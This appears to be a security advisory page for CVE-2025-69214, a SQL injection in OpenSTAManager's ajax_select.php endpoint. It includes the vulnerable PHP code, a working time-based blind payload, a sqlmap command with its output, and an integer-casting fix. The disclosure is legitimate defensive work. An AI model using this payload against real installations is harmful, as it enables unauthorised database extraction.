CVE-2025-69214

HIGH8.8EPSS 0.02%

OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)

Published: 2/6/2026Modified: 2/10/2026

Description

## Summary A SQL Injection vulnerability exists in the `ajax_select.php` endpoint when handling the `componenti` operation. An authenticated attacker can inject malicious SQL code through the `options[matricola]` parameter. ## Proof of Concept ### Vulnerable Code **File:** `modules/impianti/ajax/select.php:122-124` ```php case 'componenti': $impianti = $superselect['matricola']; if (!empty($impianti)) { $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')'; } ``` ### Data Flow 1. **Source:** `$_GET['options']['matricola']` → `$superselect['matricola']` 2. **Vulnerable:** User input concatenated directly into `IN()` clause without sanitization 3. **Sink:** Query executed via AJAX framework ### Exploit **Manual PoC (Time-based Blind SQLi):** ```http GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1 Host: localhost:8081 Cookie: PHPSESSID=<valid-session> ``` <img width="1306" height="581" alt="image" src="https://github.com/user-attachments/assets/238015dd-5644-4eed-ae8f-864dc0073011" /> **SQLMap Exploitation:** ```bash sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \ --cookie="PHPSESSID=<session>" \ --dbms=MySQL \ --technique=T \ --level=3 \ --risk=3 ``` **SQLMap Output:** ``` [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI back-end DBMS: MySQL >= 5.0.12 ``` <img width="1228" height="801" alt="image" src="https://github.com/user-attachments/assets/b0b7078b-09a7-4e53-956c-baf1d09ed59b" /> ## Impact - **Data Exfiltration:** Time-based blind SQL Injection allows complete database extraction - **Authentication Bypass:** Access to sensitive component and equipment data - **Data Manipulation:** Potential unauthorized modification of records ## Remediation Cast values to integers before using in SQL: **Before:** ```php $impianti = $superselect['matricola']; if (!empty($impianti)) { $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')'; } ``` **After:** ```php $impianti = $superselect['matricola']; if (!empty($impianti)) { $ids = array_map('intval', explode(',', $impianti)); $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')'; } ``` ## Credit Discovered by: Łukasz Rybak

Affected packages (1)

Packagist/devcode-it/openstamanagerfrom 0, <= 2.9.8

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 4.0	—	CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
osv	CVSS 3.1	HIGH8.8	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Affected packages (1)

CVSS scores

References (3)